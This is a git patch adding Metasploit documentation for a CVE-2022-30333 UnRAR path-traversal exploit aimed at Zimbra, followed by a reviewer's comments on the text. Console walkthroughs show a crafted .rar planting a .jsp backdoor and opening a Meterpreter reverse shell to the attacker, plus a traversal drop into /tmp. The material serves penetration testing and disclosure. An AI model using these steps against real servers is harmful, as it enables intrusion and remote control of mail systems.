From 860cd38bbbe499bbd6b05e4b00887cff4b6306ee Mon Sep 17 00:00:00 2001 From: Ron Bowes Date: Tue, 26 Jul 2022 10:23:24 -0700 Subject: [PATCH] Add documentation --- .../linux/fileformat/unrar_cve_2022_30333.md | 117 ++++++++++++++++++ 1 file changed, 117 insertions(+) create mode 100644 documentation/modules/exploit/linux/fileformat/unrar_cve_2022_30333.md diff --git a/documentation/modules/exploit/linux/fileformat/unrar_cve_2022_30333.md b/documentation/modules/exploit/linux/fileformat/unrar_cve_2022_30333.md new file mode 100644 index 0000000000..f10f57ee45 --- /dev/null +++ b/documentation/modules/exploit/linux/fileformat/unrar_cve_2022_30333.md 
@@ -0,0 +1,117 @@ +## Vulnerable Application + +This module exploits a symlink-based path traversal vulnerability in UnRAR 6.11 and earlier (open source version 6.1.6 and earlier). You can get the vulnerable versions here: + +* [Vulnerable unRAR version](https://www.rarlab.com/rar/rarlinux-x64-611.tar.gz) +* [Github commit](https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946) + +Zimbra is included as a specific target, because certain Zimbra versions use `unrar` to scan incoming email. Specifically, the following versions of Zimbra are affected: + +* Zimbra Collaboration 9.0.0 Patch 24 (and earlier) +* Zimbra Collaboration 8.8.15 Patch 31 (and earlier) + +Installing the vulnerable versions of Zimbra is a pain, unfortunately. Currently, the following command works to downgrade Zimbra: + +``` +$ apt-get install zimbra-patch=8.8.15.1651873147.p31.1-1.u18 zimbra-mta-patch=8.8.15.1651844231.p31.1-1.u18 zimbra-proxy-patch=8.8.15.1651844231.p31.1-1.u18 +$ zmcontrol -v +Release 8.8.15.GA.3869.UBUNTU18.64 UBUNTU18_64 FOSS edition, Patch 8.8.15_P31.1. +``` + +Followed by specifically installing the vulnerable version of `unrar` linked above. Downpatching Zimbra like that is really finnicky, though, so that likely won't always work. 
+ +## Verification Steps + +To exploit Zimbra: + +``` +msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333 +[*] Using configured payload linux/x64/meterpreter/reverse_tcp +msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146 +LHOST => 10.0.0.146 +msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set RHOSTS 10.0.0.154 +RHOSTS => 10.0.0.154 +msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit + +[*] Started reverse TCP handler on 10.0.0.146:4444 +[*] Encoding the payload as a .jsp file +[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/sbrnabwujh.jsp +[+] payload.rar stored at /home/ron/.msf4/local/payload.rar +[+] File created! Email the file above to any user on the target Zimbra server +[*] Trying to trigger the backdoor @ public/sbrnabwujh.jsp... +[*] Trying to trigger the backdoor @ public/sbrnabwujh.jsp... +[*] Trying to trigger the backdoor @ public/sbrnabwujh.jsp... +[*] Sending stage (3020772 bytes) to 10.0.0.154 +[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/sbrnabwujh.jsp +[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.154:51664) at 2022-07-20 13:33:25 -0700 + +meterpreter > getuid +Server username: zimbra +``` + +To generate a generic .rar file: + +``` +msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET 1 +TARGET => 1 +msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH '../../../../../../../../../tmp' +TARGET_PATH => ../../../../../../../../../tmp +msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_EXTENSION 'elf' +TARGET_EXTENSION => elf +msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit + +[*] Target filename: ../../../../../../../../../tmp/hftb.elf +[+] payload.rar stored at /home/ron/.msf4/local/payload.rar +``` + +(then, in a shell with a vulnerable version of unrar) + +``` +ron@fedora ~/tools/unrar $ ./unrar x ~/.msf4/local/payload.rar +UNRAR 
6.11 freeware Copyright (c) 1993-2022 Alexander Roshal + +Extracting from /home/ron/.msf4/local/payload.rar + +Extracting ZEnFEoDkBpQZ OK +Extracting ZEnFEoDkBpQZ OK +All OK +ron@fedora ~/tools/unrar $ file /tmp/hftb.elf +/tmp/hftb.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header +``` + +## Options + +### `FILENAME` + +The filename to generate + +### `TARGET_PATH` + +The path (traversal included) where the payload will extract to - eg, `../../../tmp/target.txt` + +### `TARGET_FILENAME` / `TARGET_EXTENSION` + +The filename and extension for the payload. + +The logic of both is: + +* We want to randomize the `TARGET_FILENAME`, but... +* The Zimbra exploit requires a `.jsp` extension to work + +To have a random filename but a specific extension, my best idea is to have two separate options. + +### `EncodeAsJsp` + +If set to `true`, encode the payload into .jsp format. This makes it possible to exploit Zimbra. + +### `ListenerTimeout` + +The number of seconds to wait for a new session (default = `0`, or infinite). + +### `CheckInterval` + +The frequency with which to check for the payload on the server. Every `CheckInterval`, it performs an HTTP request to the payload path. + +## Scenarios + +The most common examples are listed above in "Verification Steps".
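Review bot: the `TARGET_PATH` description under "## Options" contradicts the module's own usage earlier in the same file. The option text gives `../../../tmp/target.txt` as the example, i.e. a full file path, but the generic-target walkthrough sets `TARGET_PATH '../../../../../../../../../tmp'` (a directory) and the filename is then built from `TARGET_FILENAME` / `TARGET_EXTENSION`, producing `../../../../../../../../../tmp/hftb.elf`. Change the example to a directory (e.g. `../../../tmp`) and state that the generated filename is appended to it, otherwise a user following the option text literally ends up with a random filename appended to `target.txt`. Two smaller points: the Zimbra walkthrough sets `RHOSTS` and the module polls it ("Trying to trigger the backdoor @ public/sbrnabwujh.jsp..."), but `RHOSTS` is not listed under Options and the generic-target example never sets it; a one-line entry saying it is only needed for the Zimbra target, and that `CheckInterval` / `ListenerTimeout` govern that polling loop, would avoid confusion. Also "finnicky" should be "finicky", and "Downpatching Zimbra like that is really finnicky, though, so that likely won't always work" leaves the reader guessing; say what tends to fail, or drop the sentence, so they know whether the downgrade command is worth attempting.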